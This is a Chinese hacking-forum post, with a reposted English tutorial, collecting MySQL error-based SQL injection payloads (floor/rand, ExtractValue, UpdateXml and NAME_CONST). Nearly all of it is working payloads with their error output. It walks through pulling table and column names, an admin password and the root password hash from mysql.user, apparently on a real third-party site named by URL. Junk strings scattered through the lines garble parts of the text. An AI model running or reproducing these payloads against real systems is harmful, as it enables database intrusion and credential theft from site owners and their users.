中国网络渗透测试联盟
标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法 [打印本页]
作者: admin 时间: 2015-11-11 19:03
标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法
1、通过floor报错
可以通过如下一些利用代码
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
举例如下: J3 {2 l7 v" k% Z3 a" i5 J) n
首先进行正常查询:
mysql> select * from article where id = 1;
( W$ N* O3 V0 q# H. }# p, w. G, W2 u+—-+——-+———+
: H; {' c/ [# u Q# {+ Q6 ~1 V| id | title | content |* _' S9 M1 K$ B. [. N
+—-+——-+———+8 r+ d$ c7 b) \* p7 R
| 1 | test | do it |; c/ O, i, o6 |, ]8 P1 x
+—-+——-+———+
假如id输入存在注入的话,可以通过如下语句进行报错。
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
& T3 t# ?% m. |/ U0 XERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。" H1 T9 \2 m6 _) j7 u
例如我们需要查询管理员用户名和密码:
Method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);2 u g8 Q2 f5 |' s+ ^
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’
Method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
8 Z! a( R6 w C- sERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’
2、ExtractValue2 Z6 E1 p5 H8 b2 x3 P) ~
测试语句如下
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
8 q' K# [* x; S/ ~. g; K V$ T$ mERROR 1105 (HY000): XPATH syntax error: ’\admin888′
3、UpdateXml
测试语句
and 1=(updatexml(1,concat(0x3a,(select user())),1))
实际测试过程
mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
) w m7 R# }. J, p
" Y* {& e- v1 P. g9 O再收集:
% B. o* h8 Q1 o7 d
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
( o: h* O0 t8 G2 J6 U; c8 I! ` @0 b
Error
uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’0 Q2 G; j9 @8 R& l) G7 o
6 c0 n0 {% f5 H0 h$ S* _, C1 I3 w6 Nhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c), D) r8 \0 N; W5 d/ ~! _
3 p; G5 L, U9 l: a( r; `. SErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ 7 h$ f: a# q4 X6 O, F( s
# k/ H$ A$ C+ W7 m
MYSQL高版本报错注入技巧-利用NAME_CONST注入3 G) Y9 K+ Q: K, U! f8 V0 e7 F
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
( K' v1 u( U, D" x/ b9 F$ |
: t4 W! @ V' y) E# N4 _1 x+ x* d" @4 L
相关信息
2 n- k' K3 Z% k
$ j1 F- t0 q& b2 jNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
4 O L7 B! P% S1 z; P, [/ D6 M. Q. P) S4 A! t
Code:
0 C8 a. K" ]. l+ JNAME_CONST(DATA, VALUE)
; ^0 g* D% N4 w; b f9 O1 g) a9 C' s/ Q) Q/ R9 ]
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
$ ?$ e& X: j4 D j: P9 e
: F u: F5 }: ^! x. a: ESELECT NAME_CONST('TEST', 1)
- {6 a1 Y) {% h- Q ]( T8 p* s1 o: ?
, k" L: C6 m# b( R" c
. x1 F/ a' j+ `3 S' t: E1 N4 C/ m- g3 \- P, _1 V B" c6 K
|---------------|
, @; H3 G9 a3 i, g- t| TEST |5 h$ c4 w8 j0 r$ c# j
| |
- U4 t9 m3 F; r: L- q|---------------|( w8 N# h; h. ~
| 1 |
; S+ i- T: }; j| |; p: n7 j' x8 N
|---------------|
0 q8 B4 G* D7 y. m, i
4 Z# P1 @) r; b
: t' V, n5 w8 a7 _3 L+ o. B! G: ~ N' x% q4 |) N7 y7 f' P' i
2 d# N9 `: M/ M9 @5 K: Q( fhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
: q1 v I0 Z# }' p6 x2 \0 CIntro to MySQL Variables
7 \2 c9 f1 _4 F% K0 I0 |6 x* o6 _! r3 R# y' h: ?
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
5 |. x' K+ d% v- B$ C! H0 F; v# p/ \" \5 L7 ]" J, D+ _( r# ^% {$ b& r
Code: ~8 i4 A- ]& a' }5 @. m
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
# L& t9 G0 m* `: X" |# T# k3 ?
! L5 W+ g3 }0 ^" N9 U8 z5 v' @! n" V! l& n
6 K: ^% h. A3 Q. ]& {6 }
6 v7 X, f5 Q: i- J+ ?" a4 b
( \1 k3 p: T; \6 S" a; V3 ?Code:2 E( y A, Z/ b6 f: ]8 M8 |
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
/ M% J8 U8 ]) }' s( H+ W/ z
: U) t' n* R' ~- d5 _4 S; G A- P3 m# e+ r4 [: @7 q
VAR = Your MySQL variable.0 c7 Z+ K! R P ~5 W$ G1 S5 ?
( K" c& _# C# ^8 D7 Z
MySQL 5.1.3 Server System Variables% o* ^. J- W. u/ J7 V
9 T2 a; Q* e' T' e3 J% wLet's try it out on my site..! B5 [! N' w( ~
7 d) ^8 t2 |, {- u, J
Code:
2 a. P, g/ c2 N: Ehttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
0 _( _" O' U; v9 Z( t. ~8 `4 Z7 {# K/ V0 \ \2 R
Erroruplicate column name '5.0.27-community-nt'! H9 ~# a; F) t' y' Y9 t9 w0 Q/ E
6 ]# }1 m* q" R: c- O) ?2 ]; G" }, L5 X9 P( F/ B) w
; x+ X- j2 N5 z3 F) y' U) B
* N2 y# K* \* e, W* `8 _8 a- g2 g/ b' G& ^5 x
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...6 I B" @4 r% F( T c
' v& n, b7 k- B- ~5 H: {* w7 | L4 d
Data Extraction
* z. K9 T& Y* d+ Y$ _" f' q& {' l& a0 p9 F; k# }' h; ^
Code:
: L# E! |) Z& y8 d7 z/ }" t% l+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--6 O- z: U4 C1 B9 y6 J2 y& Z3 n+ u
* ^" D: H5 S9 Z- [: P/ {- A( I! z5 L
) A5 D$ D! c" B+ \We should get a duplicate column 1 error...
2 i- B; a' c4 M5 D3 E3 y0 Q) _# m0 L+ Y; Q# l- D$ a% Q
Code:
) c; t& f7 d1 x" Dhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
0 X) i9 P6 k Z9 m/ V" G5 e: ]1 `) C8 H) n) u) C
Erroruplicate column name '11 |$ I; D2 J7 {
% |. r7 ~# r K6 U
+ l. v& t/ Z( k: H) D$ G/ B( T- @" v0 |3 n$ E. z% p) t9 z9 e# r
; y+ F+ t& M/ |% J1 l- J4 g% c" q8 @' }$ V- a
- _3 j5 D; E* ^) i, c# h
Now let's get the tables out this bitch..& l. ~, |- k- X8 z5 N
: b k" r; |8 B" l7 c9 ^
Code:6 A) V9 v. A/ M- S* m& N
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--* Z3 q5 x2 p L$ z/ R M# F" y, B0 w
5 g5 {' z# d( z% f, c$ u% d
2 Z- b0 C) h; Y4 mLet's see if it works here, if it does, we can go on and finish the job.
+ K+ k* [6 F+ m$ `. k' S. h
: V5 o3 X2 ?# ~/ c, }3 lCode:
4 Q5 ~) ?" Y7 ]" Y1 whttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
7 k( r* c1 }2 y6 }& f$ S/ E5 T% r& [2 G4 z
8 q: Y" G1 }, E8 e. z
Erroruplicate column name 'com_admanage! N7 S, |& c7 h- g4 V8 e+ @
0 {, A, R, k/ \, f& y
' z) @% I. ?: f; H' ]! H
7 w+ `: i3 C5 O0 x1 p
- d9 \0 F* p& v0 e7 \4 T9 \( N3 {' ]7 k6 [2 r4 w0 s
6 h U" G7 U# T# Z% Q7 h
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
8 |2 j- e X" \5 ]8 H0 h# w6 W! X }% U$ x
Let's get the columns out of the user table..
& E- `' x9 Q" s. w9 `5 s4 x4 _% ^% o8 W0 F- @$ j) L
Code:' b7 s+ l4 r( `/ C3 j+ q
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--- T9 C4 a k H* n
; k4 q( t7 E7 B, _) l0 k% Q" V8 g
+ f4 z* i* l: |5 ySo mine looks like this, and I get the duplicate column name 'Host'.2 O T2 X* E. V; H# `
7 w; Y6 {, \. e5 cCode:8 {8 v! d( n; F6 Z- A Z
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--/ F7 U9 }: C! i+ o! u
: }7 R) e/ O7 F0 T: M3 D- ^
Erroruplicate column name 'Host'6 x. Y- }) F- ?/ f: @" {
# D# c% Z/ t. k
( z8 s! L4 X/ y: K, S& I* H. ~, |3 p$ K0 I
) _6 D0 C& ^" W# b% X; E
& A: m. g4 E( b; e \1 u
) O, V! J, T( M J) N- oWoot, time to finish this bitch off.
8 Y0 O4 H e- z0 n- y& Y
) r5 o3 f% n4 {. C7 u. l, fCode:) _' M- }! ^9 M2 b! v; \* c
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--5 ~" e6 C4 N. J3 \0 x
: q. p3 C c1 @8 D7 E ~ {9 g
" ^2 O* p2 N+ n3 @So mine looks like this...0 X5 ?0 X s& x8 F
* U9 S% {, N) G( w; qCode:
3 y O# o r, ?( p; v% whttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--6 G1 v0 l8 W# F2 ]9 e0 y h
( l8 ?. K% x/ v9 ~# _( C( q" B3 V
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
' O" \' N% Q) Z& ^' w4 q7 e& [, v- h# k6 W& W5 [/ X
0 Y- p6 l# j6 B( c+ W1 d- Q9 p
% ~" x: |* K2 x" j2 t" r
( ~% a& u! P( a& _# _, j5 F
) Z, h- K( F- [, f F
) r+ Y$ @& j1 V4 _# oAnd there we have it, thanks for reading.+ ^9 G) U" b# |8 K% x" h% `
8 v% b8 s Z. t6 o5 F4 T4 I, a
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) |
Powered by Discuz! X3.2 |